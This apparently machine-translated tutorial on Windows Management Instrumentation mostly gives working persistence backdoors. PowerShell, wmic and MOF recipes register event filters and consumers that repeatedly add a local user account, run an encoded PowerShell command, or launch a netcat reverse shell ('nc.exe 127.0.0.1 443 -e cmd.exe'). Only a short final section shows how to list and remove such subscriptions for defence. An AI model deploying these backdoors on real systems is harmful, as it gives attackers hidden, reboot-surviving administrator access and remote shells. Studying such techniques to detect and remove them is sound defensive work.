wmi

WMI Attack and Defense

Introduction

WMI is a Windows management technology whose full name is Windows Management Instrumentation, or Windows Management Specification. Most Windows-based software relies on this service. So some hackers will attack WMI. This article describes WMI’s methods of attack and security defense for discussion.

Each object is a class instance that represents getting various operating system information and performing related operations, with ROOT/CIMV2 as the default namespace, CIM as the database, and WQL query statements for querying WMI object instances, classes, and namespaces.

The primary interaction of

1, Powershell (Get-WmiObject, Set-WmiInstance, Invoke-WmiMethod, etc.)

For example: Get-WmiObject-Namespace "ROOT" -Class __NAMESPACE

2、Wmic

For example: wmic/NAMESPACE: "\root\CIMV2" PATH Win32_OperatingSystem

event

The event creates a query request that defines what we need to do, and we define the action once the event occurs, supporting both events.

1. Temporary event: The process to create the event is active and the temporary event is activated (run with the current permission)

For example:

# Query for new process events
$queryCreate = "SELECT * FROM __InstanceCreationEvent WITHIN 5" +"WHERE TargetInstance ISA 'Win32_Process'"

# Create an Action
$CrateAction = {
$name = $event. SourceEventArgs.NewEvent.TargetInstance.name
write-host "Process $($name) was created."
}

# Register WMI event
Register-WMIEvent -Query $queryCreate -Action $CrateAction

Each time a new process is opened, the process name is output:

clip_image001

2. Persistent events: Events are stored in the CIM database and remain active until they are removed from the database (run with system permissions and the restart remains the same)

Persistent events with backdoors

Using persistent events as a backdoor (creating requires administrator privileges) requires three parts.

1. Event filter: used to define the trigger conditions, including system startup, specific program execution, specific time intervals, etc., stored in the ROOT-subscription instance of the EventFilter object, most events use the WQL WITHIN clause to specify the polling interval.

2. Event Consumer: Used to specify specific actions to be performed, including executing commands (CommandLineEventConsumer), running scripts (ActiveScriptEventConsumer), adding log entries (NTEventLogEventConsumer), or sending mail (SMTPEventConsumer).

3, binding mechanism: binding filters to consumers (FilterToConsumerBinding class)

Backdoor instance

Whether it’s a powershell, a wmic, or a m?f file, it’s made up of three parts.

Powershell implementation

Effect: The powershell command is run every 60 seconds.

$filterName = 'Filtertest'
$consumerName = 'Consumertest'
$exePath = 'powershell -ep bypass -command “net user xxx xxx /add”'
$exePath2 = ‘powershell -ep bypass -enc dwBoAG8AYQBtAGkA’
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

Define TheFilter

$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop

Define Consumer

$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath}

Binding

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}

Wmic implementation

Effect: Triggers a bounce at a time

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE, EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE, ExecutablePath="C:\Users\admin\Desktop\nc.exe",CommandLineTemplate="C:\Users\admin\Desktop\nc.exe 127.0.0.1 443 - e c:\windows\system32\cmd.exe"

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Filtertest\"", Consumer="CommandLineEventConsumer.Name=\"Consumertest\""

clip_image002

Today, WMI attacks are also often exploited in many behaviors:

clip_image003

Mof implementation

Effect: Triggers a bounce every 30 minutes.

#!vb
#pragma namespace (“\\.\root\subscription”)
instance of __EventFilter as $FILTER
{
Name = “FilterTEST”;
EventNamespace = “root\cimv2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Minute = 30 “;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $CONSUMER
{
Name = “ConsumerTEST”;
ScriptingEngine = “VBScript”;
ScriptText =
“Set objShell = CreateObject(\”WScript.Shell\”)\n”
“objShell.Run \”C:\Windows\system32\cmd.exe /C C:\nc.exe 127.0.0.1 443 -e C:\Windows\system32\cmd.exe\”\n”;
};
instance of __FilterToConsumerBinding
{
Consumer = $CONSUMER ;
Filter = $FILTER ;
};

To execute a command:

Mofcomp xx.mof

You can also execute the vbs script file directly:

instance ofActiveScriptEventConsumer as $Cons
{
Name = “ASEC”;
ScriptingEngine = “VBScript”;
ScriptFileName = “c:\asec.vbs”;
};

Security defense

View:

#ListEventFilters
Get-WMIObject-Namespace root\Subscription -Class __EventFilter

#ListEventConsumers
Get-WMIObject-Namespace root\Subscription -Class __EventConsumer

#ListEventBindings
Get-WMIObject-Namespace root\Subscription -Class __FilterToConsumerBinding

Delete:

#Filter
Get-WMIObject-Namespace root\Subscription -Class __EventFilter -Filter”Name=’BotFilter82′” | Remove-WmiObject -Verbose

#Consumer
Get-WMIObject-Namespace root\Subscription -Class CommandLineEventConsumer -Filter”Name=’BotConsumer23′” | Remove-WmiObject -Verbose

#Binding
Get-WMIObject-Namespace root\Subscription -Class __FilterToConsumerBinding -Filter”__Path LIKE ‘%BotFilter82%’” | Remove-WmiObject -Verbose